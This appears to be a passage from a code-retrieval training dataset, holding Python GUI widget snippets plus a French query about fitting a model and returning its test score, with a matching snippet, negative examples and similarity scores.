wx.BoxSizer(wx.HORIZONTAL)\n\t\tstartButton = wx.Button(panel, label='Start Baselining', size=(170, 25))\n\t\thbox1.Add(startButton)\n\t\tvbox.Add(hbox1, flag=wx.LEFT | wx.RIGHT | wx.ALIGN_CENTRE, border=5)\n\t\t\n\t\tvbox.Add((-1, 5))\n\t\t\n\t\thbox2 = wx.BoxSizer(wx.HORIZONTAL)\n\t\tstopButton = wx.Button(panel, label='Stop Baselining', size=(170, 25))\n\t\thbox2.Add(stopButton)\n\t\tvbox.Add(hbox2, flag=wx.LEFT | wx.RIGHT | wx.ALIGN_CENTRE, border=5)\n\t\t\n\t\tvbox.Add((-1, 5))\n\t\t\n\t\thbox6 = wx.BoxSizer(wx.HORIZONTAL)\n\t\tresetButton = wx.Button(panel, label='Reset', size=(170, 25))\n\t\thbox6.Add(resetButton)\n\t\tvbox.Add(hbox6, flag=wx.LEFT | wx.RIGHT | wx.ALIGN_CENTRE, border=5)\n\t\t\n\t\tvbox.Add((-1, 10))\n\t\t\n\t\thbox3 = wx.BoxSizer(wx.HORIZONTAL)\n\t\tself.onOffText = wx.StaticText(panel, label='Off')\n\t\thbox3.Add(self.onOffText)\n\t\tvbox.Add(hbox3, flag=wx.LEFT | wx.RIGHT | wx.ALIGN_CENTRE, border=5)\n\t\t\n\t\tvbox.Add((-1, 20))\n\t\t\n\t\thbox4 = wx.BoxSizer(wx.HORIZONTAL)\n\t\tminText = wx.StaticText(panel, label='Min', style=wx.ALIGN_CENTRE)\n\t\tmaxText = wx.StaticText(panel, label='Max', style=wx.ALIGN_CENTRE)\n\t\thbox4.Add(minText, -1)\n\t\thbox4.Add(maxText, -1)\n\t\tvbox.Add(hbox4, flag=wx.EXPAND | wx.LEFT | wx.RIGHT, border=5)\n\t\t\n\t\tvbox.Add((-1, 5))\n\t\t\n\t\thbox5 = wx.BoxSizer(wx.HORIZONTAL)\n\t\tself.minBox = wx.TextCtrl(panel, style=wx.TE_READONLY)\n\t\tself.maxBox = wx.TextCtrl(panel, style=wx.TE_READONLY)\n\t\tself.minBox.SetBackgroundColour((210,210,210))\n\t\tself.maxBox.SetBackgroundColour((210,210,210))\n\t\thbox5.Add(self.minBox, -1, wx.EXPAND)\n\t\thbox5.Add(self.maxBox, -1, wx.EXPAND)\n\t\tvbox.Add(hbox5, flag=wx.LEFT | wx.RIGHT | wx.EXPAND, border=5)\n\t\t\n\t\tpanel.SetSizer(vbox)\n\t\t\n\t\t# Bind items\n\t\tframe.Bind(wx.EVT_BUTTON, self.OnStartPress, id=startButton.GetId())\n\t\tframe.Bind(wx.EVT_BUTTON, self.OnStopPress, id=stopButton.GetId())\n\t\tframe.Bind(wx.EVT_BUTTON, self.OnResetPress, id=resetButton.GetId())", "def createLabels(self):\r\n # Grid layout to organize the widgets\r\n self.grid = QGridLayout()\r\n self.labelWidgets = {\r\n\r\n \"<h2>FECHA</h2>\": (0, 0),\r\n \"<h2>BILL AREA</h2>\": (0, 3, 1, 1),\r\n \"<h2>HORA</h2>\": (1, 0),\r\n \"<h2>NOMBRE</h2>\": (2, 0),\r\n \"<h2>CUMPLEAÑOS</h2>\": (3, 0),\r\n \"<h2>CELULAR</h2>\": (4, 0),\r\n \"<h2>DIRECCIÓN</h2>\": (5, 0),\r\n \"<h2>CIUDAD</h2>\": (6, 0),\r\n \"<h2>MÉTODO DE PAGO</h2>\": (7, 0),\r\n \"<h2>PEDIDO</h2>\": (8, 0, 1, 3),\r\n \"<h2>TOTAL POLLO</h2>\": (9, 0),\r\n \"<h2>TOTAL CARNE</h2>\": (10, 0),\r\n \"<h2>EMPANACHOS</h2>\": (11, 0),\r\n \"<h2>TOTAL PRODUCTOS</h2>\": (12, 0),\r\n \"<h2>VALOR ($)</h2>\": (13, 0)\r\n }\r\n for labelName, position in self.labelWidgets.items():\r\n if len(position) == 4:\r\n self.label = QLabel(labelName)\r\n self.label.setAlignment(Qt.AlignCenter)\r\n self.label.setStyleSheet(\"\"\"\r\n color: #cac03f; font-family: times;\r\n font-weight: bold;\r\n border: 5px inset #cac03f;\r\n font-size: 15px;\r\n \"\"\")\r\n self.grid.addWidget(\r\n self.label, position[0], position[1], position[2], position[3])\r\n\r\n else:\r\n self.label = QLabel(labelName)\r\n self.label.setStyleSheet(\"\"\"\r\n color: #A8DBC5;\r\n font-family: times;\r\n font-weight: bold;\"\"\")\r\n self.grid.addWidget(self.label, position[0], position[1])\r\n # CREATING THE SPECIAL BILL LABEL\r\n self.bill = QTextEdit()\r\n self.bill.setFixedWidth(320)\r\n self.bill.setStyleSheet(\"\"\"\r\n font-family: times;\r\n font-size: large;\r\n background-color : white;\r\n border: 4px solid #A8DBC5;\r\n font-size: 15px;\r\n \"\"\")\r\n self.grid.addWidget(self.bill, 1, 3, 12, 1)\r\n # setting the main layout in order to add the logo at the top\r\n # and the labels, line Edit widgets and buttons at the bottom\r\n self.mainLayout = QVBoxLayout()\r\n # Creating the Image Label for the Business logo\r\n self.labelImg = QLabel()\r\n self.labelImg.setAlignment(Qt.AlignCenter)\r\n self.pixmap = QPixmap('kafflogo.png')\r\n self.labelImg.setPixmap(self.pixmap)\r\n # Setting the vertical layout as the main Layout of the tab 1\r\n self.tab1.setLayout(self.mainLayout)\r\n self.mainLayout.addWidget(self.labelImg)\r\n # Adding the grid layout under the image\r\n self.mainLayout.addLayout(self.grid)", "def add_label(self, text, location=(None,0)):\n label=QtWidgets.QLabel(self)\n label.setText(str(text))\n label.setAlignment(QtCore.Qt.AlignLeft)\n location=self._normalize_location(location)\n self.formLayout.addWidget(label,*location)\n return label", "def set_controls(self):\n # Image control\n image = pyxbmct.Image(addonfolder+artsfolder+'/tvh.png')\n self.placeControl(image, 0, 0, rowspan=8, columnspan=16)\n\n\t\t# Label information\n image = pyxbmct.Image(addonfolder+artsfolder+'/users.png')\n self.placeControl(image, 8, 1, rowspan=1, columnspan=14)\n\t\t\n\t\t# Username input\n image = pyxbmct.Image(addonfolder+artsfolder+'/username.png')\n self.placeControl(image, 10, 1, rowspan=1, columnspan=3)\n self.username_input = pyxbmct.Edit('')\n self.placeControl(self.username_input, 10, 4, rowspan=1, columnspan=4)\n\n\t\t# Password input\n image = pyxbmct.Image(addonfolder+artsfolder+'/password.png')\n self.placeControl(image, 11, 1, rowspan=1, columnspan=3)\n self.password_input = pyxbmct.Edit('', isPassword=True)\n self.placeControl(self.password_input, 11, 4, rowspan=1, columnspan=4)\n\n\t\t# Next button\n self.next_button = pyxbmct.Button('Next')\n self.placeControl(self.next_button, 13, 14, rowspan=1, columnspan=1)\n # Connect close button\n self.connect(self.next_button, lambda: self.page())\n\t\t\n\t\t# Close button\n self.close_button = pyxbmct.Button('Exit')\n self.placeControl(self.close_button, 13, 15, rowspan=1, columnspan=1)\n self.connect(self.close_button, lambda: self.closepage())", "def add_text_label(self, name, value=None, label=None, location=(None,0)):\n widget=widget_label.LVTextLabel(self,value=value)\n widget.setObjectName(_fromUtf8(self.name+\"_\"+name))\n return self.add_simple_widget(name,widget,label=label,add_indicator=False,location=location)", "def __init__(self, transform, size, label, loc,\n pad=0.1, borderpad=0.1, sep=2, prop=None, frameon=True):\n self.size_bar = AuxTransformBox(transform)\n self.size_bar.add_artist(Rectangle((0, 0), size, 0, fc='none', color='white', lw=3))\n\n self.txt_label = TextArea(label, dict(color='white', size='x-large', weight='normal'),\n minimumdescent=False)\n\n self._box = VPacker(children=[self.size_bar, self.txt_label],\n align=\"center\",\n pad=0, sep=sep)\n\n AnchoredOffsetbox.__init__(self, loc, pad=pad, borderpad=borderpad,\n child=self._box,\n prop=prop,\n frameon=frameon)", "def fromControls(self,widget):", "def getWidget(self):", "def create_widgets( self ):", "def create_gen_labels(master: Widget) -> None:\r\n\r\n gen_label = Label(master, text='Gen:', font=self.FONT_NORMAL, bg=self.MAIN_BG)\r\n gen_label.pack(side=LEFT)\r\n self.gen_number = Label(master, text=0, font=self.FONT_NORMAL, bg=self.MAIN_BG)\r\n self.gen_number.pack(side=LEFT)", "def create_widgets(self):\n # only ever shown card in player's hand, so create widgets when dealt\n self.name_label = tk.Label(self, text=self.name)\n self.ability_label = tk.Label(self, text=self.ability)\n self.food_label = tk.Label(self, text=\"Food: \" + str(self.food))\n self.use_button = TraitUseButton(self, text=\"USE\", command=self.use)", "def makeInstructionLabel(self, textInstruction):\n Label(self.sideFrame, text=textInstruction,\n font=self.sideFont, anchor='w').pack(fill=X, padx=10)", "def _create_signal_label(self, master, row, column, signame, minimum, maximum, unit):\n lbl_name = Label(master, text=signame, bg=COLUMN_COLOR_LIST[column], font=(\"Helvetica\", 12))\n lbl_min = Label(master, text=minimum, bg=COLUMN_COLOR_LIST[column], font=(\"Helvetica\", 9))\n lbl_max = Label(master, text=maximum, bg=COLUMN_COLOR_LIST[column + 1], font=(\"Helvetica\", 9))\n lbl_unit = Label(master, text=unit, bg=COLUMN_COLOR_LIST[column + 2], font=(\"Helvetica\", 9))\n lbl_name.grid(row=row, column=column, columnspan=3, sticky=W+E)\n lbl_min.grid(row=row+1, column=column, sticky=W+E)\n lbl_max.grid(row=row+1, column=column+1, sticky=W+E)\n lbl_unit.grid(row=row+1, column=column+2, sticky=W+E)", "def __repr__(self):\n self.makeLabel() # update the label in case it's changed.\n return self.label", "def set_controls(self):\n # Image control\n image = pyxbmct.Image(addonfolder+artsfolder+'/osc.png')\n self.placeControl(image, 0, 0, rowspan=7, columnspan=16)\n\n\t\t# Label information\n image = pyxbmct.Image(addonfolder+artsfolder+'/readers.png')\n self.placeControl(image, 7, 1, rowspan=1, columnspan=14)\n\t\t\n\t\t# Hostname input\n image = pyxbmct.Image(addonfolder+artsfolder+'/hostname.png')\n self.placeControl(image, 9, 0, rowspan=1, columnspan=4)\n self.hostname_input = pyxbmct.Edit('')\n self.placeControl(self.hostname_input, 9, 4, rowspan=1, columnspan=5)\n\n\t\t# Port input\n image = pyxbmct.Image(addonfolder+artsfolder+'/port.png')\n self.placeControl(image, 12, 1, rowspan=1, columnspan=3)\n self.port_input = pyxbmct.Edit('')\n self.placeControl(self.port_input, 12, 4, rowspan=1, columnspan=2)\n\n\t\t# Username input\n image = pyxbmct.Image(addonfolder+artsfolder+'/username.png')\n self.placeControl(image, 10, 1, rowspan=1, columnspan=3)\n self.username_input = pyxbmct.Edit('')\n self.placeControl(self.username_input, 10, 4, rowspan=1, columnspan=4)\n\t\t\n\t\t# Password input\n image = pyxbmct.Image(addonfolder+artsfolder+'/password.png')\n self.placeControl(image, 11, 1, rowspan=1, columnspan=3)\n self.password_input = pyxbmct.Edit('', isPassword=True)\n self.placeControl(self.password_input, 11, 4, rowspan=1, columnspan=4)\n\n\t\t# Close button\n self.close_button = pyxbmct.Button('Exit')\n self.placeControl(self.close_button, 13, 15, rowspan=1, columnspan=1)\n self.connect(self.close_button, lambda: self.page(Readers))", "def __init__(self, name, header, desc=None, prop=None, style=None, attr=None,\n disabled=False, css_cls=None):\n Widget.__init__(self, name, desc=desc, prop=prop, style=style, attr=attr,\n css_cls=css_cls)\n self._header = header\n self._disabled = disabled", "def pack(self, label, *widgets, **kwargs):\n col = 0\n border = kwargs.get(\"border\", 10)\n font = self.GetFont()\n if \"size\" in kwargs:\n font.SetPointSize(kwargs[\"size\"])\n if kwargs.get(\"bold\", False):\n font.SetWeight(wx.BOLD)\n\n if label != \"\":\n text = wx.StaticText(self, label=label)\n text.SetFont(font)\n if \"textcol\" in kwargs:\n text.SetForegroundColour(kwargs[\"textcol\"])\n if not widgets:\n span = (1, 2)\n else:\n span = (1, 1)\n self.sizer.Add(text, pos=(self.row, col), border=border, flag=wx.ALIGN_CENTRE_VERTICAL | wx.LEFT, span=span)\n col += 1\n else:\n text = None\n\n for w in widgets:\n span = (1, 1)\n w.label = text\n if hasattr(w, \"span\"):\n span = (1, w.span)\n w.SetFont(font)\n w.Enable(col == 0 or kwargs.get(\"enable\", True))\n self.sizer.Add(w, pos=(self.row, col), border=border, flag=wx.ALIGN_CENTRE_VERTICAL | wx.EXPAND | wx.LEFT, span=span)\n col += span[1]\n self.row += 1", "def setLabel( self, cCtrlName, cLabel ):\n self.setControlModelProperty( cCtrlName, \"Label\", cLabel )", "def create_widgets(self):\n self.instruction = Label(self, text=\"Enter the password \")\n self.instruction.grid(row=0, column=0, columnspan=2, sticky=W)\n\n self.password_entry = Entry(self)\n self.password_entry.grid(row=0, column=1, sticky=W)\n\n self.submit_button = Button(self, text=\"Submit\",\n command=self.reveal, width=10)\n self.submit_button.grid(row=2, column=0, sticky=W)\n\n self.exit_button = Button(self, text=\"Exit\",\n command=self.quit, width=10)\n self.exit_button.grid(row=2, column=1, sticky=W)\n\n #self.close_button = Button(self, text = \"Close\", command = self.quit)\n #self.close_button.grid(row = 2, column = 0, sticky = E)\n\n self.text = Text(self, width=35, height=5, wrap=WORD)\n self.text.grid(row=3, column=0, columnspan=2, sticky=W)", "def create_title(self):\n label_title = Label(self.frame, text=\"Brick Breaker\", font=(\"Arial\", 40), bg='light blue',\n fg='white')\n label_title.pack()", "def __init__(self, label: str):\n pass", "def create_widgets(self):\n for name in self.names:\n new_label = Label(text=name, id=name, font_size=50)\n self.root.ids.name_entries.add_widget(new_label)", "def init_infobox(self):\n infobox = tk.Label(self, text=\"\", justify=\"left\")\n infobox.grid(row=0, column=1, sticky=\"n\")\n self.infobox = infobox", "def create_base(self):\n if self.debug:\n print(\"Creating base\")\n self.console_panel = ConsolePanel(self.root)\n self.side_panel = SidePanel(self.root, self.populate_main_panel)\n self.side_panel.set_separator(\"word_word\")\n self.main_panel = MainPanel(self.root, action=\"word_word\")", "def create_labels(self):\n for name in self.names:\n new_label = Label(text=name)\n self.root.ids.names_box.add_widget(new_label)", "def create_widget(parent, control_name, control_value, trait,\n label_class=None, user_data=None):\n # Create the list widget: a frame\n frame = QtGui.QFrame(parent=parent)\n frame.setFrameShape(QtGui.QFrame.StyledPanel)\n\n # Create tools to interact with the list widget: expand or collapse -\n # add a list item - remove a list item\n tool_widget = QtGui.QWidget(parent)\n layout = QtGui.QHBoxLayout()\n layout.addStretch(1)\n layout.setContentsMargins(0, 0, 0, 0)\n layout.setSpacing(2)\n tool_widget.setLayout(layout)\n # Create the tool buttons\n resize_button = QtGui.QToolButton()\n layout.addWidget(resize_button)\n # Set the tool icons\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(\n _fromUtf8(\":/soma_widgets_icons/nav_down\")),\n QtGui.QIcon.Normal, QtGui.QIcon.Off)\n resize_button.setIcon(icon)\n resize_button.setFixedSize(30, 22)\n frame.user_data = user_data\n\n editable_labels = False\n handler = getattr(trait, 'handler', trait)\n if handler.inner_traits():\n editable_labels = True\n frame.inner_trait = trait.handler.inner_traits()[0]\n\n add_button = QtGui.QToolButton()\n delete_button = QtGui.QToolButton()\n layout.addWidget(add_button)\n # Set the tool icons\n icon = QtGui.QIcon()\n icon.addPixmap(\n QtGui.QPixmap(_fromUtf8(\":/soma_widgets_icons/add\")),\n QtGui.QIcon.Normal, QtGui.QIcon.Off)\n add_button.setIcon(icon)\n add_button.setFixedSize(30, 22)\n delete_button.setFixedSize(30, 22)\n # Add list item callback\n add_hook = partial(\n ControllerControlWidget.add_item, weak_proxy(parent),\n control_name, weak_proxy(frame))\n add_button.clicked.connect(add_hook)\n\n # Create the associated controller widget\n controller_widget = ControllerWidget(control_value, parent=frame,\n live=True,\n editable_labels=editable_labels,\n user_data=user_data)\n\n # Store some parameters in the list widget\n frame.trait = trait\n frame.controller = control_value\n frame.controller_widget = controller_widget\n frame.connected = False\n\n # Add the list controller widget to the list widget\n frame.setLayout(controller_widget.layout())\n\n # Set some callback on the controller control tools\n # Resize callback\n resize_hook = partial(\n ControllerControlWidget.expand_or_collapse, weak_proxy(frame),\n weak_proxy(resize_button))\n resize_button.clicked.connect(resize_hook)\n\n if getattr(trait, 'expanded') is False:\n ControllerControlWidget.set_expanded(frame, resize_button, False)\n\n # Create the label associated with the controller widget\n control_label = trait.label\n if control_label is None:\n control_label = control_name\n if label_class is None:\n label_class = QtGui.QLabel\n if control_label is not None:\n label = label_class(control_label, parent)\n else:\n label = None\n\n return (frame, (label, tool_widget))", "def __init__(self):\n\n self.boxes = [\n urwid.AttrMap(urwid.Text('QMap'), 'menu header'),\n urwid.Divider('=')\n ]\n\n self.widget = urwid.Padding(None, align='center')\n self.update()\n\n BaseTimedWidgetWrap.__init__(self, self.widget)", "def __init__(self,name,*args,**kargs):\n QtGui.QWidget.__init__(self,*args)\n layout = QtGui.QHBoxLayout()\n #layout.setSpacing(0)\n layout.setMargin(0)\n self.setLayout(layout)\n self.key = str(name)\n if 'text' in kargs:\n text = kargs['text']\n else:\n text = self.key\n if text:\n self.label = QtGui.QLabel()\n text = standardIcon(text)\n if isinstance(text,QtGui.QPixmap):\n self.label.setPixmap(text)\n else:\n self.label.setText(text)\n if 'b' in kargs.get('stretch',''):\n layout.addStretch()\n layout.addWidget(self.label)\n if 'a' in kargs.get('stretch',''):\n print 'test'\n layout.addStretch()\n\n if 'data' in kargs:\n self.data = kargs['data']\n\n if 'enabled' in kargs:\n self.setEnabled(kargs['enabled'])\n\n if 'readonly' in kargs:\n try:\n self.input.setReadOnly(kargs['readonly'])\n except:\n print \"Can not set readonly: %s,%s\" % (name,kargs)\n\n if 'width' in kargs:\n try:\n print 'SETTING WIDTH',self.input\n self.input.setMinimumWidth(kargs['width'])\n except:\n pass\n \n if 'tooltip' in kargs:\n self.setToolTip(kargs['tooltip'])\n ## if hasattr(self,'label'):\n ## self.label.setToolTip(kargs['tooltip'])\n ## try:\n ## self.input.setToolTip(kargs['tooltip'])\n ## except:\n ## pass\n\n if 'buttons' in kargs and kargs['buttons']:\n #print kargs\n self.buttons = dialogButtons(self,kargs['buttons'])\n layout.addItem(self.buttons)", "def create_widgets(self):\n Label(self, text=\"Choose your favorite movie type\").grid(row=0, column=0, sticky=W)\n\n # instructions\n Label(self, text=\"Select all that apply:\").grid(row=1, column=0, sticky=W)\n\n # comedy check button\n self.comedy = BooleanVar()\n Checkbutton(self, text=\"Comedy\", variable=self.comedy, command=self.update_text).grid(row=2, column=0, sticky=W)\n\n # drama check button\n self.drama = BooleanVar()\n Checkbutton(self, text=\"Drama\", variable=self.drama, command=self.update_text).grid(row=3, column=0, sticky=W)\n\n # romance check button\n self.romance = BooleanVar()\n Checkbutton(self, text=\"Romance\", variable=self.romance, command=self.update_text).grid(row=4, column=0, sticky=W)\n\n self.result = Text(self, width=40, height=5, wrap=WORD) # wrap=WORD when dropping 1 line down the words will not cut in the middle, drop line prior or after word end\n self.result.grid(row=5, column=0, columnspan=3)", "def __init__(self, gui, shapes, x, y, callback=None, label=None,\r\n label_pos='left', shortcut=None):\r\n if not (type(shapes) is list or type(shapes) is tuple):\r\n self.shapes = [shapes]\r\n else:\r\n self.shapes = shapes\r\n self.toggle = len(self.shapes) > 1 #this widget can toggle between two\r\n self.clicked = False\r\n self.callback = callback\r\n self.shortcut = shortcut\r\n self.label_pos = label_pos\r\n if label:\r\n self.labelobj = pi3d.String(font=gui.font, string=label, is_3d=False,\r\n camera=gui.camera, justify='L')\r\n self.labelobj.set_shader(gui.shader)\r\n else:\r\n self.labelobj = None\r\n self.relocate(x, y)\r\n if not (self in gui.widgets): #because TextBox re-runs Widget.__init__\r\n gui.widgets.append(self)\r\n self.visible = True", "def widget(self, p_int): # real signature unknown; restored from __doc__\n pass", "def widget(self, p_int): # real signature unknown; restored from __doc__\n pass", "def getControls(self):", "def TCFieldWidget(field, request):\n widget = FieldWidget(field, TCWidget(request))\n # widget.label = u'' # don't show the label twice\n return widget", "def _build_gui(self):\n box = qt.QHBoxLayout(self)\n box.addWidget(self._but)\n\n lab = self._lab\n Pol = qt.QSizePolicy\n lab.setSizePolicy(Pol.Expanding, Pol.Preferred)\n lab.setFrameStyle(qt.QLabel.Panel)\n box.addWidget(lab)", "def _build_gui(self):\n box = qt.QHBoxLayout(self)\n box.addWidget(self._but)\n\n lab = self._lab\n Pol = qt.QSizePolicy\n lab.setSizePolicy(Pol.Expanding, Pol.Preferred)\n lab.setFrameStyle(qt.QLabel.Panel)\n box.addWidget(lab)", "def __init__(self,name,value,*args,**kargs):\n \n kargs['text'] = '' # Force no label\n self.input = value\n InputItem.__init__(self,name,*args,**kargs)\n self.layout().insertWidget(1,self.input)", "def __init__(self):\n self.defaultTheme = \"DarkAmber\"\n self.version = 1.4\n self.versionName = \"class update\"\n self.title = \"Lms GUI default window\"\n self.layout = [[sg.Text(\"This is the base window class layout.\")]]\n self.elementJustification = 'c'\n self.location=(500, 300)\n self.running = True\n self.window = None\n self.event = \"\"\n self.values = []\n self.nextAction = None", "def makeTitle(self):\n l1=Label(self.app, text=\"Asset Allocation Combinations\")\n l1.grid(row=0, column=0)", "def __init__(self, x, y, parent, game, app, *args, **kwargs):\n Label.__init__(self, parent, *args, **kwargs)\n self.configure(bg=Color.MID_TONE)\n\n # Helper to create mouse-event listeners for tiles, so they don't\n # trigger when game has ended.\n def create_marker_listener(func):\n def listener(_event):\n if game.get_state() is GameState.PLAYING:\n func(_event)\n\n return listener\n\n # Highlight tile when mouse is over it\n def mouse_over(_event):\n if game.get_tile(x, y) is MarkerType.NONE:\n self.configure(bg=Color.HIGH_TONE)\n\n # Return back to normal when mouse off\n def mouse_leave(_event):\n self.configure(bg=Color.MID_TONE)\n\n self.bind(\"<Enter>\", create_marker_listener(mouse_over))\n self.bind(\"<Leave>\", create_marker_listener(mouse_leave))\n self.bind(\"<Button-1>\", create_marker_listener(\n lambda _e: app.grid_clicked(x, y)))\n self.bind(\"<ButtonRelease-1>\",\n create_marker_listener(mouse_leave))", "def buildmainframe(self):\n self.mainframewidgets=[]\n for x in range(3):\n thislabel = Label(self.mainframe, text=str(x))\n thislabel.grid()\n self.mainframewidgets.append(thislabel)", "def __init__(self, dotNumber, isRaised=False):\n\n Gtk.Alignment.__init__(self)\n if dotNumber in [1, 2, 3, 7]:\n self.set(1.0, 0.5, 0.0, 0.0)\n self.set_padding(0, 0, 3, 0)\n else:\n self.set(0.0, 0.5, 0.0, 0.0)\n self.set_padding(0, 0, 0, 3)\n\n self.label = Gtk.Label()\n self.add(self.label)\n if isRaised:\n self.raiseDot()\n else:\n self.lowerDot()", "def create_widgets(self):\r\n\r\n # we pass self since 'self' is a ttk frame\r\n # the tic tac toe buttons\r\n self.btn_tl = ttk.Button(self)\r\n self.btn_tm = ttk.Button(self)\r\n self.btn_tr = ttk.Button(self)\r\n self.btn_ml = ttk.Button(self)\r\n self.btn_mm = ttk.Button(self)\r\n self.btn_mr = ttk.Button(self)\r\n self.btn_bl = ttk.Button(self)\r\n self.btn_bm = ttk.Button(self)\r\n self.btn_br = ttk.Button(self)\r\n\r\n # the reset button\r\n self.btn_reset = ttk.Button(self)" ]
[ "0.68835676", "0.66542274", "0.63613844", "0.6344261", "0.63232493", "0.630243", "0.6290771", "0.61542106", "0.6145763", "0.6128528", "0.60839635", "0.60793793", "0.6052032", "0.60399705", "0.60251766", "0.6019413", "0.5956044", "0.59486943", "0.5947741", "0.5929713", "0.592145", "0.59027714", "0.5897525", "0.58900255", "0.5885295", "0.58769643", "0.5871108", "0.5863109", "0.58589906", "0.5858728", "0.5858443", "0.5853256", "0.58291", "0.58266807", "0.5817648", "0.5778226", "0.5695481", "0.5694086", "0.5693424", "0.5693087", "0.56831545", "0.5679762", "0.5672391", "0.56670046", "0.5660985", "0.5657537", "0.5648342", "0.5645032", "0.56372285", "0.56364197", "0.5634726", "0.56341195", "0.5606234", "0.5590015", "0.55875874", "0.5585702", "0.55826604", "0.5578148", "0.557277", "0.5563365", "0.55500185", "0.55492276", "0.5540989", "0.55287045", "0.5524254", "0.55202866", "0.5519667", "0.55154884", "0.5503924", "0.55005586", "0.54928833", "0.5487588", "0.54811376", "0.5474216", "0.54681647", "0.54602295", "0.54589826", "0.5445203", "0.5443228", "0.5431134", "0.54264784", "0.5423422", "0.54200536", "0.5418309", "0.5411461", "0.5411225", "0.54037434", "0.5378702", "0.5378702", "0.5366552", "0.53653085", "0.5365219", "0.5365219", "0.5359049", "0.5358661", "0.5353649", "0.53518176", "0.5350866", "0.53450125", "0.5341609" ]
0.60125613
16
fit le modele puis retourne ses performances en test
def score(self, archi:ArchitectureNN): archi.fit_model(self.train_data, **self.train_params) return archi.compute_test_score(self.test_data)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def fit_test(self):", "def experiment_models(train, test, train_target, test_target):\n # Linear models\n linear_models = [(LinearRegression, {\"n_jobs\": -1}),\n (Lasso, {\"alpha\": 3}),\n (Ridge, {\"alpha\": 3}),\n (LinearSVR, {\"random_state\": 0, \"tol\": 1e-5})]\n\n # Add polynomial features\n poly = preprocessing.PolynomialFeatures(2)\n\n # scaler\n scaler = preprocessing.StandardScaler().fit(train)\n\n print(\"Use linear models with linear features\")\n for model_ in linear_models:\n scaled_train = scaler.transform(train)\n scaled_test = scaler.transform(test)\n model = model_[0](**model_[1])\n model.fit(scaled_train, train_target.to_numpy())\n train_pred = model.predict(scaled_train)\n valid_pred = model.predict(scaled_test)\n print(\"=========================================\")\n print(f\"Model : {model_}\")\n compute_metrics(train_pred, train_target, valid_pred, test_target)\n print(\"=========================================\")\n\n print(\"Use linear models with polynomial features\")\n train = poly.fit_transform(train)\n test = poly.transform(test)\n scaler = preprocessing.StandardScaler().fit(train)\n for model_ in linear_models:\n scaled_train = scaler.transform(train)\n scaled_test = scaler.transform(test)\n model = model_[0](**model_[1])\n model.fit(scaled_train, train_target.to_numpy())\n train_pred = model.predict(scaled_train)\n valid_pred = model.predict(scaled_test)\n print(\"=========================================\")\n print(f\"Model : {model_}\")\n compute_metrics(train_pred, train_target, valid_pred, test_target)\n print(\"=========================================\")", "def eval_perf_total(model, X_train, y_train, X_test, y_test):\n\n y_hat_train = model.predict(X_train)\n y_hat_test = model.predict(X_test)\n \n train_mae = metrics.mean_absolute_error(y_train, y_hat_train)\n train_mse = metrics.mean_squared_error(y_train, y_hat_train)\n train_rmse = np.sqrt(metrics.mean_squared_error(y_train, y_hat_train))\n train_r = metrics.r2_score(y_train, y_hat_train)\n\n print('Evaluating Performance on Training Data:\\n')\n print(f' Train Mean Absolute Error: {train_mae:,.2f}')\n print(f' Train Mean Squared Error: {train_mse:,.2f}\\n')\n print(f'Train Root Mean Squared Error: {train_rmse:,.2f}')\n print(f'Train R-Square Value: {round(train_r,2)}')\n\n print('\\n'+'---'*25+'\\n')\n\n test_mae = metrics.mean_absolute_error(y_test, y_hat_test)\n test_mse = metrics.mean_squared_error(y_test, y_hat_test)\n test_rmse = np.sqrt(metrics.mean_squared_error(y_test, y_hat_test))\n test_r = metrics.r2_score(y_test, y_hat_test)\n\n print('Evaluating Performance on Testing Data:\\n')\n print(f' Test Mean Absolute Error: {test_mae:,.2f}')\n print(f' Test Mean Squared Error: {test_mse:,.2f}\\n')\n print(f'Test Root Mean Squared Error: {test_rmse:,.2f}')\n print(f'Test R-Square Value: {round(test_r,2)}')", "def eval_perf_train(model, X_train=None, y_train=None):\n\n # if X_train != None and y_train != None:\n\n y_hat_train = model.predict(X_train)\n \n train_mae = metrics.mean_absolute_error(y_train, y_hat_train)\n train_mse = metrics.mean_squared_error(y_train, y_hat_train)\n train_rmse = np.sqrt(metrics.mean_squared_error(y_train, y_hat_train))\n train_r = metrics.r2_score(y_train, y_hat_train)\n\n print('Evaluating Performance on Training Data:\\n')\n print(f'Train Mean Absolute Error: {train_mae:,.2f}')\n print(f'Train Mean Squared Error: {train_mse:,.2f}\\n')\n print(f'Train Root Mean Squared Error: {train_rmse:,.2f}')\n print(f'Train R-Square Value: {round(train_r,2)}')\n\n # if X_test != None and y_test != None:\n\n # y_hat_test = model.predict(X_test)\n\n # test_mae = metrics.mean_absolute_error(y_test, y_hat_test)\n # test_mse = metrics.mean_squared_error(y_test, y_hat_test)\n # test_rmse = np.sqrt(metrics.mean_squared_error(y_test, y_hat_test))\n # test_r = metrics.r2_score(y_test, y_hat_test)\n\n # print('Evaluating Performance on Testing Data:\\n')\n # print(f'Test Mean Absolute Error: {test_mae:,.2f}')\n # print(f'Test Mean Squared Error: {test_mse:,.2f}\\n')\n # print(f'Test Root Mean Squared Error: {test_rmse:,.2f}')\n # print(f'Test R-Square Value: {round(test_r,2)}')", "def run_model(Xp_train=None,y_train=None,Xp_test=None,y_test=None,mt='bl', params={}):\n models = { \n \"bl\": lambda : None,\n \"lr\": LinearRegression,\n \"dtr\": DecisionTreeRegressor,\n \"gbr\": GradientBoostingRegressor\n }\n\n # Select Model, returns None for baseline\n model = models[mt](**params)\n\n # Fit Model and make predictions\n if mt != 'bl': # If model not baseline\n # Dummy encoding , (each category of n levels or attributes is converted into n-1 dichotomous variables)\n X_train = pd.get_dummies(Xp_train, columns=['type', 'duration','location'],drop_first=True)\n X_test = pd.get_dummies(Xp_test, columns=['type', 'duration','location'],drop_first=True)\n model.fit(X_train,y_train)\n # Make Predictions\n y_pred = model.predict(X_test)\n #print X_test.shape\n y_predtr = model.predict(X_train) \n else: # Compute baseline\n y_pred = np.median(y_train).repeat(len(y_test))\n y_predtr = np.median(y_train).repeat(len(y_train))\n \n \n\n # Report metrics\n print(\"Model name: %s\" % (model.__class__.__name__ if model else \"Price Median Baseline\"))\n if mt != 'bl':\n print(\"hyper-parameters: \" + \", \".join( \"{0}: {1}\".format(k,v) for (k,v) in params.items() ) )\n print(\"Mean absolute error training set: %.2f\" % mean_absolute_error(y_train, y_predtr)) \n print(\"Mean absolute error testing set: %.2f \\n\" % mean_absolute_error(y_test, y_pred))", "def test_models(directorio=''):\r\n \r\n print('The trained models will be tested now')\r\n start = time.time()\r\n \r\n busqueda = \"ls \" + directorio + 